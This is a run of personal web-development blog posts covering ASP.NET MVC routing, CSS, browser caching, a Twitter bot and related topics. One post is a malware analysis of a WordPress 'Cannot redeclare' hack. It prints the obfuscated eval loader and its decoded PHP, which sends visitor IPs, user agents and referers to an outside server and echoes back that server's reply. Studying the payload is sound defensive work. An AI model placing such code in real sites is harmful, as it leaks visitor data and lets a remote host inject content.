One of the most powerful features of ASP.NET MVC is its URL routing engine. The routing engine routes incoming requests to the correct controller action, but it can also generate URLs for you. This is normally done with the URL helper in views:

// Regular ASP.NET MVC:
@Url.Action("View", "Blog", new { id = 123 })
// With T4MVC:
@Url.Action(MVC.Blog.View(123))

This is great, as it means changing your routes will automatically update all the internal URLs throughout your site. If you're using T4MVC (which I strongly suggest), you also get compile-time checking on your URLs, which means it's practically impossible to have broken internal links (any invalid link will cause a compile error).

This is all well and good on the server side, but there's no equivalent on the client side, meaning that people often use one of these approaches:

  • Hard-code the URL directly in the JavaScript
  • Store the URL in a data attribute on the relevant element (or body)
  • Create a global JavaScript object containing all the URLs the page requires (for example, Jarret Meyer's approach; a rough sketch follows this list)
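
To make that last approach concrete, here's a rough sketch of the idea (my own illustration, not Jarret Meyer's actual code): the server renders an object of URLs into the page, and the rest of your JavaScript reads from that object instead of hard-coding anything:

// Rendered into the page by the server (the names and URLs here are made up):
window.siteUrls = {
	blogView: '/Blog/View/123',
	logout: '/Account/LogOut'
};

// Client-side code then looks URLs up on the object:
var xhr = new XMLHttpRequest();
xhr.open('GET', window.siteUrls.blogView);
xhr.send();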

Each of these approaches has its downsides. The last one is the most promising, and I had the idea of generalising this approach and making it into a library that can be dropped into any site. There are some existing projects that tackle this problem, the main one being Zack Owens' ASP.NET MVC JavaScript Routing. Zack's library looked good but I had two issues with it:

  • It's unnecessarily tightly coupled with jQuery, meaning you have to load the whole of jQuery just to use it, which is annoying if your site is just vanilla JavaScript or uses a library like PrototypeJS or MooTools instead.
  • It requires you to use a custom routing syntax rather than the standard ASP.NET MVC routing.

I decided to write my own library to solve this problem. My library is called RouteJs, and it is available on NuGet. It supports ASP.NET MVC 2, 3 and 4. Basically, RouteJs consists of a small piece of JavaScript to handle building URLs, as well as some information about all the routes you want to expose. All of this is served using an ASP.NET handler, so you don't need to change your build scripts or anything like that. Simply drop it into your site.

Once loaded in your site, RouteJs provides a global Router object, similar to the URL helper that comes with ASP.NET MVC. For example, the same blog view URL can be generated with the following code:

var url = Router.action('Blog', 'View', { id: 123 });

It supports most of the common features of ASP.NET MVC routing, including areas, default values and simple constraints. It does not currently support ASP.NET Web API, but I'll definitely add support if someone requests it.
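
For example, default values mean you shouldn't need to pass parameters that the route already supplies. A hypothetical call (assuming the same Router.action signature shown above, and that the parameters object can simply be left off when it isn't needed):

// Hypothetical: a route whose defaults cover the remaining parameters
// should resolve without passing anything extra.
var listUrl = Router.action('Blog', 'Index');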

For more information, please see the readme on GitHub. Please let me know what you think!

Until next time,

— Daniel

Google used to offer some little widgets that you could embed on your site which would show if you were online or offline in Google Talk, and let people start a conversation directly from the web page. I used to scrape the HTML and grab my status from there to display it on my site. Unfortunately they deprecated them last year and pulled the service offline recently.

I thought it'd be useful and couldn't find anything similar, so I started a site that provides similar functionality. Currently it can show an online/offline icon and provide the data in JSON format. I'm going to add some more functionality and make it more user-friendly as I get time.

Here's a screenshot of how I display it on my site:

Screenshot of MyStatus information

Here's the URL: http://mystatus.im/

Technologies I'm using are Node.js, Express, Sequelize, and node-xmpp. This is my first live Node.js site.

Let me know what you think!

I've been using instant messaging for as long as I've had Internet access. The very first instant messaging program I used was Windows Live Messenger, back when it was called MSN Messenger. Over the last few years, I've watched the official Messenger client get progressively worse and more bloated, and more and more people move away from it to other IM platforms such as Google Talk (which uses Jabber/XMPP, an open protocol). Now an era is coming to an end. Tomorrow is the day that Microsoft finally retires Windows Live Messenger and begins forcing all users to use Skype. This does make sense from a business perspective - they're getting rid of the old network that they make barely any money from, and moving everything to the one they acquired for $8.5 billion in 2011, which has 55 million users online concurrently.

However, from a technology perspective, this is definitely a huge step backwards. They're referring to the WLM to Skype migration as an "upgrade", I guess in the same way that moving from a mansion to a one-bedroom unit is also an "upgrade". The truth is that Skype really feels like a voice/video chat app with basic instant messaging capabilities added as an afterthought, probably because that's exactly what it is. Don't get me wrong, Skype is great for voice and video chats, but for instant messaging it's nowhere near as good as Windows Live Messenger. Skype is missing a lot of features that are present in Windows Live Messenger, including:

  • Custom emoticons
  • Easy extensibility. Windows Live Messenger has a large community and a large number of add-ins available, such as Messenger Plus
  • Groups via Windows Live Groups. These are persistent groups similar to Facebook groups. Similar to a chat room except whenever someone comes online, they automatically appear in the group
  • Interoperability and third-party clients. Windows Live Messenger supports the XMPP protocol, which makes writing third-party clients easy. Skype uses a closed, proprietary protocol and has no third-party clients (this is why Pidgin doesn't support Skype). This is a huge one for me - I don't want to use separate programs for every single instant messaging network I use!
  • A web-based messenger, official or otherwise (like eBuddy). This ties in to the point above about third-party clients
  • Custom display names
  • The ability to sign out from all locations at once. Skype lets you sign in at multiple locations (like Windows Live Messenger), but there's no way to remotely sign out of all of them (useful if, say, someone guesses your password and logs in as you)
  • File transfers and games that actually work
  • Voice clips (sending short sound bites without having to start a full two-way conversation)
  • Remote assistance (as far as I know, Skype lets you show the other person your screen, but they can't take control)
  • Email notifications for Hotmail / Windows Live / Outlook accounts
  • Ironically, I used to find that the video quality in Windows Live Messenger was much better than Skype's

And I'm sure there are many others that I've missed. Microsoft has had months to improve Skype so that it could at least compete with Windows Live Messenger, but they have not done anything at all.

It's the end of an era. I'm rarely on Windows Live Messenger these days, but if you do have me as a contact, feel free to add me on Google Talk.

Until next time,

— Daniel

Back when IE 9 came out, it was the first major browser to start caching redirects to improve performance. The IE team wrote a detailed blog post about it, but they still got some backlash (mainly from people that didn't set correct no-cache headers on redirects with side effects, like login pages).

The recently released version of Safari for iOS 6 has started caching AJAX POST requests, with no notification to developers at all. Not only is this unexpected, but it goes against the HTTP 1.1 standard, which states:

9.5 POST

...

Responses to this method are not cacheable, unless the response includes appropriate Cache-Control or Expires header fields.

This means that if you have something like an edit page that uses AJAX to post the form, the first edit will work, but subsequent edits will return a cached "Success" message instead of sending the request to the server!

This is somewhat similar to Internet Explorer caching AJAX GET requests, except caching GET requests is nowhere near as dangerous. GET requests are allowed to be cached, but POST requests are neither safe nor idempotent (they can have side effects), so they should never be cached by default. Sure, IE caches AJAX GET requests more aggressively than other browsers, but that's allowed by the HTTP spec:

The response to a GET request is cacheable if and only if it meets the requirements for HTTP caching described in section 13.

Caching POST requests is horrible. How many times have you added no-cache headers to your POST pages? I'm going to have a guess and say never, since no other browser in the history of the World Wide Web has cached POST requests. This move has essentially broken some AJAX-based edit forms, and developers might not even notice the breakage initially. I hope this is a bug rather than intended behaviour, and that it gets fixed at some point. Safari used to be a horrible browser with many DOM issues... I hope it's not heading that way again.
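
In the meantime, the only real defence seems to be to do exactly that: explicitly mark your POST responses as uncacheable. A minimal sketch of what that might look like in an Express app (the route and handler here are made up purely for illustration; the important bit is the headers):

var express = require('express');
var app = express();

// Hypothetical edit endpoint. The Cache-Control / Expires headers tell
// Safari (and any other cache) not to reuse the response for later POSTs.
app.post('/posts/:id/edit', function (req, res) {
	res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
	res.setHeader('Expires', '0');
	res.json({ status: 'Success' });
});

app.listen(3000);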

The original release of ASP.NET MVC used HTML helpers with a syntax like the following:

@Html.TextArea("Title")

These worked, but if you renamed the property in your model (for example, from “Title” to “Subject”) and forgot to update your view, you wouldn’t catch the error until you actually tried out the page and noticed your model wasn’t populating properly. By that time, you might already have users on the site wondering why things aren’t working.

ASP.NET MVC 2 introduced the concept of strongly-typed HtmlHelper extensions, and ASP.NET MVC 3 extended this even further. An example of a strongly typed HtmlHelper is the following:

@Html.TextAreaFor(post => post.Title)

These allow you to write more reliable code, as view compilation will fail if you rename the property in your model class but forget to update the view. If you use precompiled views, this error will be caught before deployment.

Creating your own

The built-in helpers are good, but quite often it’s nice to create your own helpers (for example, if you have your own custom controls like a star rating control or rich-text editor).

Read more ⇒

Modern browsers have support for RGBA colours, allowing you to have semi-transparent background colours. Unfortunately, this only works in awesome browsers (everything except IE 8 and below). However, IE does support a custom gradient filter. Whilst it's commonly used to render gradients (obviously), it also supports alpha transparency. If you set the start and end colours to be the same, this has the same effect as setting an alpha value on the colour.

This involves quite a lot of CSS for each alpha colour you want to use, but we can automate this tedious code generation with a LESS mixin. If you're still using 'pure' CSS, I'd highly suggest looking into LESS and SASS; they're extremely handy. In any case, I use a mixin similar to the following:

.rgba(@colour, @alpha)
{
	@alphaColour: hsla(hue(@colour), saturation(@colour), lightness(@colour), @alpha);
	@ieAlphaColour: argb(@alphaColour);
	
	background-color: @colour; // Fallback for older browsers
	background-color: @alphaColour; 
	
	// IE hacks
	zoom: 1; // hasLayout
	background-color: transparent\9;
	-ms-filter:  "progid:DXImageTransform.Microsoft.gradient(startColorstr=@{ieAlphaColour}, endColorstr=@{ieAlphaColour})"; // IE 8+
	    filter: ~"progid:DXImageTransform.Microsoft.gradient(startColorstr=@{ieAlphaColour}, endColorstr=@{ieAlphaColour})"; // IE 6 & 7 
	
}

Note that IE requires the element to have layout in order to apply filters to it (hence the zoom: 1 hack), and IE 8 changed the filter syntax to use -ms-filter instead. This LESS mixin can be used as follows:

#blah
{
        .rgba(black, 0.5);
}

This will set the element to a 50% black background. This mixin could be converted to SASS quite easily, too. Ideally I would have liked to apply the IE styles in a better way (like using conditional comments to set classes on the element) but I couldn't get this approach working with LESS.

Hope this helps someone!

Until next time,
— Daniel

Over the past few months, there have been a few vulnerabilities in PHP scripts utilised by various WordPress themes. One of the largest hacks was back in August, when a Remote File Inclusion (RFI) vulnerability was found in TimThumb, a thumbnail generation script used by a lot of WordPress themes. This vulnerability allowed attackers to run arbitrary PHP code on vulnerable sites. As a result, thousands of sites were hacked.

The most common result of your site being hacked like this is having some sort of malicious code added to your PHP files. This is often invisible, and people don't notice that their site has malicious code lurking in it until much later. However, sometimes the hacked code does have errors in it. One particular payload is being referred to as the "'Cannot redeclare' hack", as it causes an error like the following to appear in your site's footer:

Fatal error: Cannot redeclare _765258526() (previously declared in /path/to/www/wp-content/themes/THEME/footer.php(12) : eval()'d code:1) in /path/to/www/index.php(18) : eval()'d code on line 1

This particular hack affects all the index.php and footer.php files in your WordPress installation. If you are affected by this hack and open any index.php or footer.php file, you'll see code that starts like this: (the full code is on Pastebin)

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5Wj...

Decoding the Code

If you're this far, I assume you're a PHP developer (or at least know the basics of PHP). The malicious code above is actually highly obfuscated PHP code, which means that the actual intent of the code is hidden and it looks like gibberish. The eval statement runs arbitrary PHP code, so this line will base64-decode and decompress the big block of code, then run it. So... what does the code actually do? Obviously we can't tell with it in its current state. It does take a bit of effort, but this code can be "decoded" relatively easily. Obfuscation is not one-way; it can always be undone. While we can't get back the original variable names, we can see what functions the code is executing.

The first step in decoding this code is replacing all instances of eval with echo, and then running the script. This should output the code being executed, instead of actually executing it. After doing this, I ended up with something like the following:

$GLOBALS['_2143977049_']=Array();
function _765258526($i){$a=Array();return base64_decode($a[$i]);}

eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyMjM...

Great, another layer of gzipped/base64'd obfuscation. This technique is common with obfuscated code like this; multiple layers of obfuscation make it harder to decode, as it requires more effort. I guess the "bad guys" think that people will get tired of trying to unobfuscate the code and give up, or something like that. When a case like this is encountered, keep replacing eval with echo and re-running the script until there are no eval statements left. After decoding all the eval'd code and formatting the result, I ended up with this. While there's readable code there now, it's still obfuscated.

Once you're this far, if you look closely at the code, you'll notice that a lot of it is encoded using base64. The next step to unobfuscating this code is to decode all the base64-encoded text. That is, find all instances of base64_decode(...) and replace them with the base64-decoded version. Once I did that, I ended up with this:

<?php 
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
        return '91.196.216.64';
}
 
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
        $a=Array('http://','/btt.php?ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
        return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)]) ._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt', 'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
    return 'curl_version';
}
if ($GLOBALS['_399629645_'][0](_393632915(0))) 
{
        $ch=$GLOBALS['_399629645_'][1]($url);
        $GLOBALS['_399629645_'][2]($ch,CURLOPT_RETURNTRANSFER,true);
        $GLOBALS['_399629645_'][3]($ch,CURLOPT_HEADER,round(0));
        $GLOBALS['_399629645_'][4]($ch,CURLOPT_TIMEOUT,round(0+0.75+0.75+0.75+0.75));
        $re=$GLOBALS['_399629645_'][5]($ch);
        $GLOBALS['_399629645_'][6]($ch);
}
else
{
        $re=$GLOBALS['_399629645_'][7]($url);  
}
echo $re;
?>

Now you simply need to go through the code and "execute it in your head". Follow the execution path of the code, and see which variables are used where. There's some usage of arrays to disguise certain variables. What I did was first replace the two function calls (_1618533527 and _1847265367), and then replace the array usages (_1203443956_ and _399629645_). Substitute the variables in the places they're used, and the code should be fully unobfuscated. Once fully unobfuscated, the code came down to the following:

<?php
$url = 'http://91.196.216.64/btt.php?ip=' . $_SERVER['REMOTE_ADDR'] . '&host=' . $_SERVER['HTTP_HOST'] . '&ua=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ref=' . $_SERVER['HTTP_REFERER'];

if (function_exists('curl_version'))
{
	$ch = curl_init($url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	$re = curl_exec($ch);
	curl_close($ch);
}
else
{
	$re = file_get_contents($url);
}
echo $re;

So, what it's actually doing is sending a request to 91.196.216.64 (a server located in Russia), telling it the visitor's IP address, your site's hostname, the visitor's user agent (what browser they're using), and the referer (how they got to the page). This is not directly malicious (this code can't do anything bad by itself), which makes it interesting. My theory is that the developer of the worm is using this to build a list of all vulnerable sites, to use them for further hacks in the near future.

So, that's it. Hopefully this post wasn't too boring (and perhaps you even learnt how to unobfuscate code like this). As more people learn how to do this, I suspect the "hackers" will keep getting smarter and devising more clever obfuscation techniques. Until then, finding out what the code actually does is relatively quick and easy, as I've demonstrated here.

Until next time,
— Daniel

Am I the only person that cringes when I see HTML like this?

<div class="h1Title"><div class="spriteicon_img_mini" id="icon-name_mini"></div>Page Title</div>

Or like this?

<!--Start Footer-->
<div id="heading-bottom_bg" class="spriteheading_bg footer">
	<ul class="links footer_ul">
		<li class="footer_li"><a class="footer_li_a bottomlink" href="../index.html">Home</a></li>
		<li class="footer_li"><span class="footer" style="font-size:18px;">&#9642;</span></li>
		...
		<li class="footer_li"><a class="footer_li_a bottomlink" href="/logout/">Log out</a></li>
	</ul>
</div>

Notice the classes on all those elements. Really? A web developer that doesn't know about the <h1> tag or CSS descendant/child selectors? Why do people feel the need to use <div> tags for everything, when there are other, more semantic tags available? It really doesn't make sense to me; some of the first HTML tags I learnt were <h1> and <ul>.

For what it's worth, this is how I'd rewrite those two blocks of HTML:

<h1 class="icon-name">Page Title</h1>
<!--Start Footer-->
<div id="footer">
	<ul>
		<li><a href="../index.html">Home</a> &#9642;</li>
		...
		<li><a href="/logout/">Log out</a></li>
	</ul>
</div>

It's good to keep your HTML and CSS selectors as simple as possible. There's no need for a "footer_li" class when you can just use "#footer li" in your CSS. The "icon-name" CSS class on the <h1> is used for a CSS sprite to display next to the heading. Also, as an alternative, the separator (▪) that was originally in a <span> after all the footer items can easily be added via the :after pseudo selector instead of being in the <li>.

It's really frustrating that there are so many "web developers" that don't seem to know basic HTML. It's okay if you're just starting to learn; that's fair enough. The HTML I "wrote" when I started web development was horrendous. And by "wrote" I mean "created in FrontPage 98". But it's another thing altogether to be a developer for a number of years and still write ugly HTML like this.

Ugly JavaScript seems to be way more common, though. But that's a rant for another day.

So I thought I'd finally write a little blog post about a Twitter bot I made a while ago. A few people emailed me asking for the source code, so I previously posted it on webDevRefinery, but never on my own blog. Basically, all the bot does is search for whenever people mention "over 9000" or "over nine thousand", and replies with "WHAT, NINE THOUSAND?!". Pretty simple, but I wanted to learn about using the Twitter API. It seems to have inspired the creation of other Twitter bots, like AnnoyingNavi and The Spacesphere, which I think is pretty cool. 😃

The source code is available as a Gist on GitHub. It is written in PHP and requires the PECL OAuth extension to be installed. I think it's a pretty good example of a simple "search and reply" Twitter bot that could easily be extended to do more useful things.

Until next time,

— Daniel

I was rewriting my site recently (to use the Kohana framework instead of WordPress), and I decided to write my own blog system at the same time. Finally, I've finished a basic version of it, and it's now live! This site is running on it, so hopefully there are no major issues! I do still love WordPress, but as a developer, it's often fun to create your own stuff (you know exactly what the code is doing, and it does exactly what you want). The code for this whole website is now available on GitHub; maybe some of you will find it interesting (especially if you're doing something similar yourself). It's still a bit rough around the edges, but it's working fine. I've still got a bit I'd like to do with the blog (like improving the administration section). 😃

My old blog used to have a "microblog" section where I'd occasionally post photos and stuff. I've moved all that onto a Tumblr account, although now I'm thinking I should have used Posterous instead. Tumblr's uptime seems quite bad. I really don't understand why it's so popular... It seems like it's mainly the community rather than the site itself.

Eventually I might even post a proper blog article here. Or to my other blog with my girlfriend 😃

Until then,

— Daniel
